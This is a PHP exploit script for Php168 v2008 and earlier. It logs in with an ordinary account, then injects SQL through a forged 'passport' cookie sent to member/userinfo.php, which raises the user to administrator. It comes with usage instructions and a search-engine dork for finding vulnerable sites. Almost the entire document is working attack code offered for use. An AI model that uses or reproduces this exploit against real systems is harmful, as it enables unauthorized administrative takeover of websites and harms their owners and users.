Php168 v2008 ©

EXP: 

#!/usr/bin/php 
<?php 

print_r('' 
+---------------------------------------------------------------------------+ 
Php168 <= v2008 update user access exploit 
from:http://www.sitedir.com.cn
dork: "Powered by PHP168" 
+---------------------------------------------------------------------------+ 
''); 
/** 
* works regardless of php.ini settings 
*/ 
if ($argc < 5) { 
    print_r('' 
+---------------------------------------------------------------------------+ 
Usage: php ''.$argv[0].'' host path user pass 
host:      target server (ip/hostname) 
path:      path to php168 
user:      login username 
pass:      login password 
Example: 
php ''.$argv[0].'' localhost /php168/ 
+---------------------------------------------------------------------------+ 
''); 
    exit; 
} 

error_reporting(7); 
ini_set(''max_execution_time'', 0); 

$host = $argv[1]; 
$path = $argv[2]; 
$user = $argv[3]; 
$pass = $argv[4]; 

$resp = send(); 
preg_match(''/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/'', $resp, $cookie); 

if ($cookie) 
    if (strpos(send(), ''puret_t'') !== false) 
        exit("Expoilt Success!\nYou Are Admin Now!\n"); 
    else 
        exit("Exploit Failed!\n"); 
else 
    exit("Exploit Failed!\n"); 

function rands($length = 8) 
{ 
    $hash = ''''; 
    $chars = ''ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz''; 
    $max = strlen($chars) - 1; 
    mt_srand((double)microtime() * 1000000); 
    for ($i = 0; $i < $length; $i++) 
        $hash .= $chars[mt_rand(0, $max)]; 

    return $hash; 
} 

function send() 
{ 
    global $host, $path, $user, $pass, $cookie; 

    if ($cookie) { 
        $cookie[1] .= '';USR=''.rands()."\t%2b31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]#\t\t"; 
        $cmd = ''''; 

        $message = "POST ".$path."member/userinfo.php  HTTP/1.1\r\n"; 
        $message .= "Accept: */*\r\n"; 
        $message .= "Accept-Language: zh-cn\r\n"; 
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; 
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; 
        $message .= "CLIENT-IP: ryat\\\r\n"; 
        $message .= "Host: $host\r\n"; 
        $message .= "Content-Length: ".strlen($cmd)."\r\n"; 
        $message .= "Connection: Close\r\n"; 
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n"; 
        $message .= $cmd; 
    } else { 
        $cmd = "username=$user&password=$pass&step=2"; 

        $message = "POST ".$path."login.php  HTTP/1.1\r\n"; 
        $message .= "Accept: */*\r\n"; 
        $message .= "Accept-Language: zh-cn\r\n"; 
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; 
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; 
        $message .= "Host: $host\r\n"; 
        $message .= "Content-Length: ".strlen($cmd)."\r\n"; 
        $message .= "Connection: Close\r\n\r\n"; 
        $message .= $cmd; 
    } 

    $fp = fsockopen($host, 80); 
    fputs($fp, $message); 

    $resp = ''''; 

    while ($fp && !feof($fp)) 
        $resp .= fread($fp, 1024); 

    return $resp; 
} 

?> 